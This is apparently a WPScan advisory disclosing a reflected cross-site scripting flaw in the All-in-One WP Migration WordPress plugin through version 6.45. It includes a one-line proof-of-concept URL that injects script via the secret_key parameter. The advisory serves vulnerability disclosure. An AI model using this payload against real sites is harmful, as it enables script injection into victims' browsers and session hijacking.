All-in-One WP Migration <= 6.45 - Reflected Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
All-in-One WP Migration is vulnerable to Reflected Cross-Site Scripting on secret_key parameter.
Proof of Concept
http://example.com/wp-admin/admin-ajax.php?action=ai1wm_status&secret_key="}<img src=x onerror=alert(1)><!--

Affects Plugin

fixed in version 6.46

References

URL https://wordpress.org/plugins/all-in-one-wp-migration/#developers

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Oways
Submitter Website http://oways.me
Submitter Twitter @0w4ys
Views 249
Verified No
WPVDB ID 8851

Timeline

Publicly Published 2017-06-20 (3 months ago)
Added 2017-06-21 (3 months ago)
Last Updated 2017-06-21 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.